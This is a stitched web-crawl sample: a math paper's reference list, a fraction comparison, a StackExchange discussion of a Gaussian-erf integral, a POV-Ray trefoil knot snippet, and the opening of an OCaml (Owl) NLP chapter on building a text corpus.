10.1090/S0002-9939-1978-0507327-1\n\n5. 5.\n\nBaak C, Moslehian MS: On the stability of J *-homomorphisms. Nonlinear Anal TMA 2005, 63: 42–48. 10.1016/j.na.2005.04.004\n\n6. 6.\n\nChudziak J, Tabor J: Generalized Pexider equation on a restricted domain. J Math Psychol 2008, 52: 389–392. 10.1016/j.jmp.2008.04.002\n\n7. 7.\n\nCzerwik S: Functional Equations and Inequalities in Several Variables. World Scientific, River Edge, NJ 2002.\n\n8. 8.\n\nEshaghi Gordji M, Rassias JM, Savakohi MB: Approximation of the quadratic and cubic functional equations in RN-spaces. Eur J Pure Appl Math 2009,2(4):494–507.\n\n9. 9.\n\nHyers DH, Isac G, Rassias ThM: Stability of Functional Equations in Several Variables. Birkhäuser, Basel 1998.\n\n10. 10.\n\nJung S: Hyers-Ulam-Rassias Stability of Functional Equations in Mathematical Analysis. Hadronic Press, Palm Harbor; 2001.\n\n11. 11.\n\nRassias JM: On approximation of approximately linear mappings by linear mappings. J Funct Anal 1982, 46: 126–130. 10.1016/0022-1236(82)90048-9\n\n12. 12.\n\nRassias JM: On approximation of approximately linear mappings by linear mappings. Bull Sci Math 1984, 108: 445–446.\n\n13. 13.\n\nRassias JM: Solution of a problem of Ulam. J Approx Theory 1989, 57: 268–273. 10.1016/0021-9045(89)90041-5\n\n14. 14.\n\nRassias JM: Solution of the Ulam stability problem for the quartic mapping. Glasnik Matematicki 1999,34(54):243–252.\n\n15. 15.\n\nRassias ThM: On the stability of functional equations and a problem of Ulam. Acta Appl Math 2000, 62: 23–130. 10.1023/A:1006499223572\n\n16. 16.\n\nRassias ThM: Functional Equations, Inequalities and Applications. Kluwer Academic Publishers, Dordrecht; 2003.\n\n17. 17.\n\nRavi K, Rassias JM, Arunkumar M, Kodandan R: Stability of a generalized mixed type additive, quadratic, cubic and quartic functional equation. JIPAM 2009,10(4):29. Article ID 114\n\n18. 18.\n\nAlsina C: On the stability of a functional equation arising in probabilistic normed spaces. General Inequalities, Oberwolfach 1986, 5: 263–271. Birkhäuser, Basel (1987)\n\n19. 19.\n\nChang SS, Rassias JM, Saadati R: The stability of the cubic functional equation in intuitionistic random normed spaces. Appl Math Mech 2010, 31: 21–26. 10.1007/s10483-010-0103-6\n\n20. 20.\n\nMirmostafaee M, Mirzavaziri M, Moslehian MS: Fuzzy stability of the Jensen functional equation. Fuzzy Set Syst 2008, 159: 730–738. 10.1016/j.fss.2007.07.011\n\n21. 21.\n\nMirzavaziri M, Moslehian MS: A fixed point approach to stability of a quadratic equation. Bull Braz Math Soc 2006, 37: 361–376. 10.1007/s00574-006-0016-z\n\n22. 22.\n\nMiheţ D, Radu V: On the stability of the additive Cauchy functional equation in random normed spaces. J Math Anal Appl 2008, 343: 567–572.\n\n23. 23.\n\nMiheţ D: The probabilistic stability for a functional equation in a single variable. Acta Math Hungar 2009, 123: 249–256. 10.1007/s10474-008-8101-y\n\n24. 24.\n\nMiheţ D: The fixed point method for fuzzy stability of the Jensen functional equation. Fuzzy Set Syst 2009, 160: 1663–1667. 10.1016/j.fss.2008.06.014\n\n25. 25.\n\nMiheţ D, Saadati R, Vaezpour SM: The stability of the quartic functional equation in random normed spaces. Acta Appl Math 2010, 110: 797–803. 10.1007/s10440-009-9476-7\n\n26. 26.\n\nMiheţ D, Saadati R, Vaezpour SM: The stability of an additive functional equation in Menger probabilistic φ -normed spaces. Math Slovaca 2011, 61: 817–826. 10.2478/s12175-011-0049-7\n\n27. 27.\n\nBaktash E, Cho Y, Jalili M, Saadati R, Vaezpour SM: On the stability of cubic mappings and quadratic mappings in random normed spaces. J Inequal Appl 2008, 2008: Article ID 902187.\n\n28. 28.\n\nEshaghi Gordji M, Zolfaghari S, Rassias JM, Savadkouhi MB: Solution and stability of a mixed type cubic and quartic functional equation in quasi-Banach spaces. Abst Appl Anal 2009, 2009: 14. Article ID 417473\n\n29. 29.\n\nSaadati R, Vaezpour SM, Cho Y: A note on the \"On the stability of cubic mappings and quadratic mappings in random normed spaces\". J Inequal Appl 2009, 2009: Article ID 214530.\n\n30. 30.\n\nMohamadi M, Cho Y, Park C, Vetro P, Saadati R: Random stability of an additive-quadratic-quartic functional equation. J Inequal Appl 2010, 2010: 18. Article ID 754210\n\n31. 31.\n\nHadžić O, Pap E: Fixed Point Theory in PM-Spaces. Kluwer Academic, Dordrecht; 2001.\n\n32. 32.\n\nHadžić O, Pap E, Budincević M: Countable extension of triangular norms and their applications to the fixed point theory in probabilistic metric spaces. Kybernetica 2002, 38: 363–381.\n\n33. 33.\n\nŠerstnev AN: On the notion of a random normed space. Dokl Akad Nauk SSSR 1963, 149: 280–283. (in Russian)\n\n34. 34.\n\nSchweizer B, Sklar A: Probabilistic Metric Spaces. Elsevier, North Holand; 1983.\n\n35. 35.\n\nHensel K: Uber eine neue Begrundung der Theorie der algebraischen Zahlen. Jahres Deutsch Math Verein 1897, 6: 83–88.\n\n36. 36.\n\nMirmostafaee M, Moslehian MS: Fuzzy stability of additive mappings in non-Archimedean Fuzzy normed spaces. Fuzzy Set Syst 2009, 160: 1643–1652. 10.1016/j.fss.2008.10.011\n\n37. 37.\n\nLuxemburg WAJ: On the convergence of successive approximations in the theory of ordinary differential equations, II. Nederl. Akad. Wetensch. Proc. Ser. A 61 = Indag. Math 1958, 20: 540–546.\n\n38. 38.\n\nJung C: On generalized complete metric spaces. Bull Am Math Soc 1969, 75: 113–116. 10.1090/S0002-9904-1969-12165-8\n\n39. 39.\n\nMiheţ D: The stability of the additive Cauchy functional equation in non-Archimedean fuzzy normed spaces. Fuzzy Set Syst 2010, 161: 2206–2212. 10.1016/j.fss.2010.02.010\n\n40. 40.\n\nChang SS, Cho Y, Kang Y: Nonlinear Operator Theory in Probabilistic Metric Spaces. Nova Science Publishers Inc., New York; 2001.\n\n41. 41.\n\nKutukcu S, Tuna A, Yakut AT: Generalized contraction mapping principle in intuitionistic Menger spaces and application to differential equations. Appl Math Mech 2007, 28: 799–809. 10.1007/s10483-007-0610-z\n\n42. 42.\n\nSaadati R, Park J: On the intuitionistic fuzzy topological spaces. Chaos Soliton Fract 2006, 27: 331–344. 10.1016/j.chaos.2005.03.019\n\n43. 43.\n\nAtanassov KT: Intuitionistic fuzzy sets. Fuzzy Set Syst 1986, 20: 87–96. 10.1016/S0165-0114(86)80034-3\n\n44. 44.\n\nDeschrijver G, Kerre EE: On the relationship between some extensions of fuzzy set theory. Fuzzy Set Syst 2003, 23: 227–235.\n\nDownload references\n\n## Author information\n\nAuthors\n\n### Corresponding author\n\nCorrespondence to Reza Saadati.\n\n## Additional information\n\n### Authors' contributions\n\nAll authors carried out the proof. All authors conceived of the study, and participated in its design and coordination. All authors read and approved the final manuscript.\n\n### Competing interests\n\nThe authors declare that they have no competing interests.\n\n## Rights and permissions\n\nReprints and Permissions\n\n## About this article\n\n### Cite this article\n\nRassias, J.M., Saadati, R., Sadeghi, G. et al. On nonlinear stability in various random normed spaces. J Inequal Appl 2011, 62 (2011). https://doi.org/10.1186/1029-242X-2011-62\n\nDownload citation\n\n• Received:\n\n• Accepted:\n\n• Published:\n\n### Keywords\n\n• generalized Hyers-Ulam stability\n• quartic functional equation\n• random normed space\n• intuitionistic random normed space", null, "" ]
[ null, "https://journalofinequalitiesandapplications.springeropen.com/track/article/10.1186/1029-242X-2011-62", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8160967,"math_prob":0.9997429,"size":25498,"snap":"2021-04-2021-17","text_gpt3_token_len":8148,"char_repetition_ratio":0.1541147,"word_repetition_ratio":0.13858695,"special_character_ratio":0.33084947,"punctuation_ratio":0.1773617,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99994564,"pos_list":[0,1,2],"im_url_duplicate_count":[null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-22T00:29:47Z\",\"WARC-Record-ID\":\"<urn:uuid:a1bbb793-8630-4ac7-b2b2-14da80c1537f>\",\"Content-Length\":\"989522\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:92a301ff-d2c7-420f-9347-51897a1926c9>\",\"WARC-Concurrent-To\":\"<urn:uuid:b799a14f-be55-4be5-994f-373a360aef89>\",\"WARC-IP-Address\":\"151.101.248.95\",\"WARC-Target-URI\":\"https://journalofinequalitiesandapplications.springeropen.com/articles/10.1186/1029-242X-2011-62\",\"WARC-Payload-Digest\":\"sha1:FT4GOKB3TXNSWHK6A44X46DNU5X4OMKJ\",\"WARC-Block-Digest\":\"sha1:6J3PRF3IFIEUE4VJMFHSWLY2M6DOEHK4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618039554437.90_warc_CC-MAIN-20210421222632-20210422012632-00450.warc.gz\"}"}
https://answers.everydaycalculation.com/compare-fractions/24-4-and-24-35
[ "# Answers\n\nSolutions by everydaycalculation.com\n\n## Compare 24/4 and 24/35\n\n1st number: 6 0/4, 2nd number: 24/35\n\n24/4 is greater than 24/35\n\n#### Steps for comparing fractions\n\n1. Find the least common denominator or LCM of the two denominators:\nLCM of 4 and 35 is 140\n\nNext, find the equivalent fraction of both fractional numbers with denominator 140\n2. For the 1st fraction, since 4 × 35 = 140,\n24/4 = 24 × 35/4 × 35 = 840/140\n3. Likewise, for the 2nd fraction, since 35 × 4 = 140,\n24/35 = 24 × 4/35 × 4 = 96/140\n4. Since the denominators are now the same, the fraction with the bigger numerator is the greater fraction\n5. 840/140 > 96/140 or 24/4 > 24/35\n\nMathStep (Works offline)", null, "Download our mobile app and learn to work with fractions in your own time:\nAndroid and iPhone/ iPad\n\n#### Compare Fractions Calculator\n\nand\n\n© everydaycalculation.com" ]
[ null, "https://answers.everydaycalculation.com/mathstep-app-icon.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.84789604,"math_prob":0.98777664,"size":890,"snap":"2021-21-2021-25","text_gpt3_token_len":326,"char_repetition_ratio":0.2054176,"word_repetition_ratio":0.0,"special_character_ratio":0.4494382,"punctuation_ratio":0.07070707,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99101144,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-13T00:06:45Z\",\"WARC-Record-ID\":\"<urn:uuid:e6b0a6ca-56b3-4a0b-8b1d-3397cf6dc05c>\",\"Content-Length\":\"7810\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:17506619-3a8c-465d-910e-0765921e1f27>\",\"WARC-Concurrent-To\":\"<urn:uuid:85f84b31-5b05-4678-a32e-d48f471b7099>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/compare-fractions/24-4-and-24-35\",\"WARC-Payload-Digest\":\"sha1:SQN7DYAMOTACAQ2ZEXAGGXIGURIIPID7\",\"WARC-Block-Digest\":\"sha1:VY7Y7OV6CUYCJVQCTMSXLA4L6PHOWONX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487586465.3_warc_CC-MAIN-20210612222407-20210613012407-00022.warc.gz\"}"}
https://math.stackexchange.com/questions/2345874/int-texte-ax2-texterf-leftbx-c-right-dx/2348230
[ "# $\\int\\text{e}^{-ax^2 } \\text{erf}\\left(bx + c\\right) dx$\n\nI'm hoping to find a closed expression for the following integral. $$\\int\\text{e}^{-ax^2 } \\text{erf}\\left(bx + c\\right) dx$$ One can find a solution for a family of products between exponentials and error functions. None of which apparently have the offset term in the error function.\n\nI have tried tackling the problem with two approaches.\n\nApproach #1: Expanding the error function hoping to find nice cancelations leading to the maclerin series of some known elementary function. Following a similar approach by Alex:\n\n\\begin{aligned} \\int\\text{e}^{-ax^2 } \\text{erf}\\left(bx + c\\right) dx &= \\frac{2}{\\sqrt{\\pi}} \\sum_{n=0}^\\infty \\frac{(-1)^n }{n!(2n+1)} \\int(bx+c)^{2n +1} \\text{e}^{-ax^2} dx \\\\ & = \\frac{2}{\\sqrt{\\pi}} \\sum_{n=0}^\\infty \\frac{(-1)^n }{n!(2n+1)} \\int \\sum_{k=0}^{2n+1} {{2n+1}\\choose{k}} (bx)^{k} c^{2n+1-k} \\text{e}^{-ax^2} dx \\\\ & = \\frac{2}{\\sqrt{\\pi}} \\sum_{n=0}^\\infty \\frac{(-1)^n }{n!(2n+1)} \\sum_{k=0}^{2n+1} {{2n+1}\\choose{k}} c^{2n+1-k} b^k\\int x^{k} \\text{e}^{-ax^2} dx = \\\\ &\\frac{2}{\\sqrt{\\pi}} \\sum_{n=0}^\\infty \\frac{(-1)^n }{n!(2n+1)} \\sum_{k=0}^{2n+1} {{2n+1}\\choose{k}} c^{2n+1-k} b^k \\left(-\\frac{1}{2}a^{-\\frac{k+1}{2}} \\Gamma\\left(\\frac{k+1}{2},ax^2\\right)\\right) \\\\ &= -\\frac{1}{\\sqrt{a}\\sqrt{\\pi}} \\sum_{n=0}^\\infty \\frac{(-1)^n }{n!(2n+1)} \\sum_{k=0}^{2n+1} {{2n+1}\\choose{k}} c^{2n+1-k} \\left(\\frac{b}{\\sqrt{a}}\\right)^k \\Gamma\\left(\\frac{k+1}{2},ax^2\\right) \\end{aligned}\n\nI have used the binomial expansion for $(bx + c)^{2n+1}$ and that $\\int x^k \\text{e}^{-ax^2}dx = -\\frac{1}{2}a^{-\\frac{k+1}{2}} \\Gamma\\left(\\frac{k+1}{2} ,ax^2\\right)$ where $\\Gamma(,)$ is the incomplete gamma function. Too bad, the last term can not be combined again in the form of a binomial expansion.\n\nApproach #2: Instead of expanding the error function, I tried writing it in terms of the cumulative CDF function (Q-Function) as $\\text{erf}(x) = 2\\Phi(\\sqrt{2} x) - 1$. However, the following can be shown to be true using integration under the integral sign with respect to $\\mu$. [Section 2.4, and ref] $$\\frac{1}{\\sqrt{2 \\pi} \\sigma}\\int_{-\\infty}^{\\infty}\\Phi(\\lambda x) \\text{e}^{-\\frac{(x - \\mu)^2}{2 \\sigma^2}}dx =\\Phi\\left(\\frac{\\lambda \\mu}{\\sqrt{1+\\lambda^2\\sigma^2}}\\right)$$\n\nNow with some change of variables and rescaling we are instead interested in the following integral: $$\\int\\text{e}^{a_1 x^2 + a_2 x} \\text{erf}\\left(x\\right) dx = \\underbrace{2\\int \\text{e}^{a_1 x^2 + a_2 x} \\Phi(\\sqrt{2} x) dx}_{I} - \\underbrace{\\int \\text{e}^{a_1 x^2 + a_2 x} dx}_{easy}$$\n\nHowever, what I'm not certain of if I can use the trick of integration under integral sign for the indefinite integral labeled I. Can I, with some change of variables, use the result deduced for the definite integral case as $\\Phi\\left(\\frac{\\lambda \\mu}{\\sqrt{1+\\lambda^2\\sigma^2}}\\right) + C(x)$?\n\nEDIT: It seems that the problem in had has no closed form solution as pointed out by user90369. Also, user90369 has pointed out that the following more general case have no closed form solution. $$\\int x^{2n} \\text{e}^{-ax^2} \\text{erf}(bx+c) dx$$ I was wondering, if there are any good approximations that I can use here. By good, I mean refer to an error that is $|e(x)| \\leq 10^{-5} \\forall x$. For starter, I was looking at the high accuracy approximations in here for the erf function. Unfortunately, none of these approximations result into an integral that inherits a closed form solution. I, however, have the following suggested approach with the use of the following identity. $$\\text{erf}(bx+c) = 2 \\Phi\\left(\\sqrt{2} (bx+c)\\right) - 1$$ This results into the following: \\begin{aligned} \\int\\text{e}^{-ax^2 } \\text{erf}\\left(bx + c\\right) dx = 2\\int \\text{e}^{-ax^2 } \\Phi\\left(\\sqrt{2} (bx+c)\\right) dx - \\int \\text{e}^{-ax^2 } dx \\end{aligned} Now, one can use the approximation of the $\\Phi$-function that results from applying Chernof's bound. Link $$\\Phi(x) \\approx \\frac{1}{12} \\text{e}^{-\\frac{x^2}{2}} + \\frac{1}{4} \\text{e}^{-\\frac{2}{3} x^2}$$ I'd like to take a suggestion of how good is this approximation after computing the integral. Or maybe if there are other better approximations/recommendations that result into a manageable integral afterwards.\n\n• @user90369 Thanks. Would you care suggesting an approximation? For instance, all the approximations provided here people.math.sfu.ca/~cbm/aands/page_299.htm are not useful in solving the resulting integral. I was considering approximating the $\\Phi$ function with an exponential from Chernof's bound. en.wikipedia.org/wiki/Q-function – Adel Bibi Jul 5 '17 at 12:17\n• @user90369 Also, there appears to be some hope for the definite integral case. math.stackexchange.com/questions/2236490/… – Adel Bibi Jul 5 '17 at 12:27\n• There is a very big difference between $\\int$ and $\\int_{-\\infty}^\\infty$ . Maybe someone can give you an useful answer if you decide where your focus is here. – user90369 Jul 5 '17 at 12:38\n• If you use the method in math.stackexchange.com/questions/2236490/… (the link you've mentioned) you will get a formula for $\\int\\limits_{-\\infty}^\\infty e^{-ax^2} \\text{erf}(bx+c)dx$ . One must substitute $x$ by $(x-c)/b$ and then do the derivation of the integral with respect to $c$ . – user90369 Jul 5 '17 at 15:45\n• You haven't defined what a \"good\" approximation is here (for you) but anyway you can make numerical tests with some values and see whether they meet your expectations. To approximate $Q$ and therefore at the end $\\,\\text{erf} \\,$ by sums of $e^{-a(x+b)^2}$ is of course a good idea. – user90369 Jul 5 '17 at 16:07\n\nI don't know if this helps for an useful approximation but maybe it's better than nothing. :-)\n\nFor $$\\,v\\in\\mathbb{N}_0\\,$$ we get\n\n$$\\int x^{2v+1}e^{-ax^2}dx= -\\frac{v!e^{-ax^2}}{2a^{v+1}}\\sum\\limits_{j=0}^v\\frac{(ax^2)^j}{j!} + C_{2v+1}$$\n\nand\n\n$$\\int x^{2v}e^{-ax^2}dx= \\frac{(2v)!\\sqrt{a\\pi}\\text{erf}(\\sqrt{a}x)}{2^v v!(2a)^{v+1}}-e^{-ax^2}\\sum\\limits_{j=0}^{v-1}\\frac{(v-j)!(2v)!x^{2v-2j-1}}{2^j v!(2v-2j)!(2a)^{j+1}} + C_{2v}$$\n\nand it follows:\n\n\\begin{align} & \\hphantom{ {}={}} \\int e^{-ax^2} \\text{erf}(bx+c)dx \\\\ &= \\sum\\limits_{k=0}^\\infty\\frac{(-1)^k}{k!(2k+1)}\\int (bx+c)^{2k+1} e^{-ax^2} dx \\\\ &= \\sum\\limits_{k=0}^\\infty \\frac{(-1)^k}{k!(2k+1)}\\sum_{v=0}^{2k+1}\\binom {2k+1} v b^v c^{2k+1-v}\\int x^v e^{-ax^2} dx \\\\ &= \\sum\\limits_{k=0}^\\infty \\frac{(-1)^k}{k!(2k+1)}\\sum_{v=0}^k\\binom {2k+1} {2v} b^{2v} c^{2k+1-2v}\\int x^{2v} e^{-ax^2} dx \\\\ &\\hspace{5mm} +\\sum\\limits_{k=0}^\\infty \\frac{(-1)^k}{k!(2k+1)}\\sum_{v=0}^k\\binom {2k+1} {2v+1} b^{2v+1} c^{2k-2v}\\int x^{2v+1} e^{-ax^2} dx \\\\ &= \\sum\\limits_{k=0}^\\infty\\frac{(-1)^k}{k!(2k+1)} \\sum\\limits_{v=0}^k \\binom {2k+1} {2v} b^{2v}c^{2k-2v+1} \\\\ &\\hspace{3cm} \\cdot \\left( \\frac{(2v)!\\sqrt{a\\pi}\\text{erf}(\\sqrt{a}x)}{2^v v!(2a)^{v+1}}-e^{-ax^2}\\sum\\limits_{j=0}^{v-1}\\frac{(v-j)!(2v)!x^{2v-2j-1}}{2^j v!(2v-2j)!(2a)^{j+1}} \\right) \\\\ &\\hspace{5mm} - \\sum\\limits_{k=0}^\\infty\\frac{(-1)^k}{k!(2k+1)} \\sum\\limits_{v=0}^k \\binom {2k+1} {2v+1} b^{2v+1}c^{2k-2v} \\frac{v!e^{-ax^2}}{2a^{v+1}}\\sum\\limits_{j=0}^v\\frac{(ax^2)^j}{j!} + C \\\\ &= \\sqrt{a\\pi}\\text{erf}(\\sqrt{a}x)\\sum\\limits_{k=0}^\\infty\\frac{(-1)^k}{k!(2k+1)}\\sum\\limits_{v=0}^k \\binom {2k+1} {2v} \\frac{(2v)!b^{2v}c^{2k-2v+1}}{2^v v!(2a)^{v+1}} \\\\ &\\hspace{5mm} -e^{-ax^2}\\sum\\limits_{k=0}^\\infty\\frac{(-1)^k}{k!(2k+1)}\\sum\\limits_{v=0}^k \\binom {2k+1} {2v} b^{2v}c^{2k-2v+1}\\sum\\limits_{j=0}^{v-1}\\frac{(v-j)!(2v)!x^{2v-2j-1}}{2^j v!(2v-2j)!(2a)^{j+1}} \\\\ &\\hspace{5mm} -e^{-ax^2}\\sum\\limits_{k=0}^\\infty\\frac{(-1)^k}{k!(2k+1)}\\sum\\limits_{v=0}^k \\binom {2k+1} {2v+1} b^{2v+1}c^{2k-2v} \\frac{v!}{2a^{v+1}}\\sum\\limits_{j=0}^v\\frac{(ax^2)^j}{j!} + C \\end{align}\n\n• Thanks for the approach. Not sure really if that helps alot. I was looking into some more simpler forms as the result of the required integral will be later integrated too over some other parameter. I have tried the approximation mentioned in the OP; however, this approximation is not continuous. Resulting in a disjunction in the final solution that is broken into pieces depending on the region of integration. This is because $\\Phi(x) \\approx \\frac{1}{2} e^{-\\frac{1}{2}x^2} \\forall x \\ge 0$. – Adel Bibi Jul 11 '17 at 8:23\n• @AdelBibi : The series is the exact result. For simplification it's necessary to specify additional decision criteria, e.g. the value ranges ​​of the parameters. – user90369 Jul 11 '17 at 10:10\n• I have looked at it more now. I think that should be a good approximation. However, may you detail the integral. Also, I don't quite see where did the error function disappear after the second line. Also, are there a missing equal signs from third and forth row? Could you add some details to it so that I can officially accept it as an answer? – Adel Bibi Jul 12 '17 at 9:23\n• @AdelBibi: Sorry, yes, you are right. I have add some steps. --- The error function doesn't disappear, it's a part of the solution. --- Missing equal signs ? No, but the terms and sums are partly too long for one line. (Maybe your screen display is different to mine ? Or do I misunderstand you ?) – user90369 Jul 12 '17 at 9:53\n• @AdelBibi : You are welcome (and sorry for the inconvenience because of a too short explanation first). :-) – user90369 Jul 13 '17 at 8:45" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7981438,"math_prob":0.9996611,"size":4204,"snap":"2019-35-2019-39","text_gpt3_token_len":1498,"char_repetition_ratio":0.14404762,"word_repetition_ratio":0.05109489,"special_character_ratio":0.36869648,"punctuation_ratio":0.06088993,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99994814,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-19T09:21:47Z\",\"WARC-Record-ID\":\"<urn:uuid:a35d15b7-b420-4635-b394-7a079fd11bc3>\",\"Content-Length\":\"157887\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c2af7ac5-c54d-444c-b25a-42afe88f6fc5>\",\"WARC-Concurrent-To\":\"<urn:uuid:c3000935-0800-449d-a7d5-e6a2be949aae>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://math.stackexchange.com/questions/2345874/int-texte-ax2-texterf-leftbx-c-right-dx/2348230\",\"WARC-Payload-Digest\":\"sha1:CL3WIIMRTHRVMUZASU5IYMZQYKMZU6O4\",\"WARC-Block-Digest\":\"sha1:2SNCV5KER5542MEYELM5QK2MPIHB3YED\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514573465.18_warc_CC-MAIN-20190919081032-20190919103032-00367.warc.gz\"}"}
http://jalape.no/math/tknottxt.htm
[ "### Threefoil knot\n\nThe standard threefoil knot. This is a \"sausage\" mode rendering. To acheive this in PoV was somewhat hairy. Look at code below.\n\nThis is just clipped from a POV file I did to draw a knot\n\n``` //various constants\n\nuumin = 0,uumax = 4*pi\n\nvvmin = 0,vvmax = 2*pi\n\na=1, b=0.3, c=0.5, d=0.3\n\n//preliminary calculations\n\nr=a+b*cos(1.5*uu)\n\nxx=r*cos(uu)\n\nyy=r*sin(uu)\n\nzz=c*sin(1.5*uu)\n\ndx=-1.5*b*sin(1.5*uu)*cos(uu)-(a+b*cos(1.5*uu))*sin(uu)\n\ndy=-1.5*b*sin(1.5*uu)*sin(uu)+(a+b*cos(1.5*uu))*cos(uu)\n\ndz=1.5*c*cos(1.5*uu) //Derivatives\n\nqn=vnormalize() //Vector operatons\n\nqvn=vnormalize()\n\nww=vcross(qn,qvn)\n\n//points and normals\n\nx1=xx+d*(qvn.x*cos(vv)+ww.x*sin(vv)) //Calculate the\n\ny1=yy+d*(qvn.y*cos(vv)+ww.y*sin(vv)) //points. ww.x is the\n\nz1=zz+d*ww.z*sin(vv) //x value of ww vector\n\nnx1=qvn.x*cos(vv)+ww.x*sin(vv) //Normals needed to\n\nny1=qvn.y*cos(vv)+ww.y*sin(vv) //make smooth triangles\n\nnz1=ww.z*sin(vv)\n\n```\n\nHere is the PoV3-source I used" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.54988045,"math_prob":0.99919957,"size":789,"snap":"2019-13-2019-22","text_gpt3_token_len":348,"char_repetition_ratio":0.16050956,"word_repetition_ratio":0.0,"special_character_ratio":0.38403043,"punctuation_ratio":0.13656388,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99999166,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-24T03:09:51Z\",\"WARC-Record-ID\":\"<urn:uuid:ce67d37f-78af-4343-9211-45f2d5ca97fe>\",\"Content-Length\":\"1956\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:de9fbf89-c2a1-49a4-9079-c232a305fece>\",\"WARC-Concurrent-To\":\"<urn:uuid:9bce3b61-f33d-4f76-98dd-f6fd02c05ba4>\",\"WARC-IP-Address\":\"85.166.188.140\",\"WARC-Target-URI\":\"http://jalape.no/math/tknottxt.htm\",\"WARC-Payload-Digest\":\"sha1:B7YDO7F54DLYP2ETC6EAPB5OS6Y3U36R\",\"WARC-Block-Digest\":\"sha1:LVBOTVROAX2QKJ732DZ3AIGYQBSR37S2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912203168.70_warc_CC-MAIN-20190324022143-20190324044143-00316.warc.gz\"}"}
https://ocaml.xyz/book/nlp.html
[ "Back\n\n# Natural Language Processing\n\nText is a dominant media type on the Internet along with images, videos, and audios. Many of our day-to-day tasks involve text analysis. Natural language processing (NLP) is a powerful tool to extract insights from text corpora.\n\n## Introduction\n\nNLP is a field of research that helps computers understand, interpret and manipulate human language. It combines many disciplines, including linguistics, computer science, information engineering, and artificial intelligence, etc. NLP is often considered difficult in computer science, since the rules that lie behind natural languages are not always easy for computers to understand. For example, the abstract ideas such as sarcastic and humour are still difficult to convey to computers. Besides, in the real world the data that generated by conversations and tweets etc. are unstructured and cannot be fit well into the traditional row and column structure. The unstructured data are difficult to manipulate.\n\nNLP is a large topic that covers many different advanced problems. Information Retrieval focuses on recognising structured information such as key relations or event types from given unstructured information. The Named Entity Recognition task belongs to this category. Machine Translation is one of the most important fields in NLP. It involves translating text or speech from one language to another using computer programs. Currently we are still far from being able to build translation systems that can match the quality of human translation. Text generation also covers a lot of NLP tasks. The generated text can be used to explain or describe certain input, combining information from multiple sources into a summary, or for interactive conversation with human participants. Research in these fields often needs linguistic knowledge, and deep learning approaches have also achieved good performance on many NLP tasks.\n\nWe surely cannot cover all of them in this one single chapter, perhaps not even a whole book. To this end, in this chapter we mainly focus on information retrieval, and specifically, topic modelling. In this chapter, we will use a news dataset crawled from the Internet. It contains 130000 pieces of news from various sources, each line in the file representing one entry. For example we the first line/document is:\n\na brazilian man who earns a living by selling space for tattoo adverts on his body is now looking for a customer for his forehead , it appears ... borim says when clients do n't pay or cancel an ad , he crosses them out . \" skinvertising \" caused a stir in the mid-2000s , when many dot.com companies experimented with it...\n\n## Text Corpus\n\nNormally we call a collection of documents a text corpus, which contains a large and structured set of texts. For example, for the English language there are the Corpus of Contemporary American English, Georgetown University Multilayer Corpus, etc. Our news collection is also one such example. To perform NLP tasks such as topic modelling, the first and perhaps the most important thing is to represent a text corpus as format that the models can process, instead of directly using natural language.\n\nFor the task of topic modelling, we perform the tokenisation on the input English text. The target is to represent each word as an integer index so that we can further process the numbers instead of words. This is called the tokenisation of the text. Of course we also need to have a mapping function that from index to word.\n\n### Step-by-step Operation\n\nThe NLP module in Owl supports building a proper text corpus from given text dataset. In this section we will show how we can build a corpus from a collection of documents, in a step by step way.\n\nIn the first step, remove the special characters. We define a regular expression regexp_split for special characters such as ,, ?, \\t etc. First remove them, and then convert all the text into lower-case. The code below defines such a process function, and the Nlp.Corpus.preprocess apply it to all the text. Note this function will not change the number of lines in a corpus.\n\nlet simple_process s =\nStr.split Owl_nlp_utils.regexp_split s\n|> List.filter (fun x -> String.length x > 1)\n|> String.concat \" \"\n|> String.lowercase_ascii\n|> Bytes.of_string\n\nlet preprocess input_file =\nlet output_file = input_file ^ \".output\" in\nNlp.Corpus.preprocess simple_process input_file output_file\n\nBased on the processed text corpus, we can build the vocabulary. Each word is assigned a number id, or index, and we have the dictionary to map word to index, and index to word. This is achieved by using the Nlp.Vocabulary.build function.\n\nlet build_vocabulary input_file =\nlet vocab = Nlp.Vocabulary.build input_file in\nlet output_file = input_file ^ \".vocab\" in\nNlp.Vocabulary.save vocab output_file\n\nThe build function returns a vocabulary. It contains three hash tables. The first maps a word to an index, and the second index to word. The last hash table is a map between index and its frequency, i.e. number of occurrence in the whole text body. We can check out the words of highest frequency 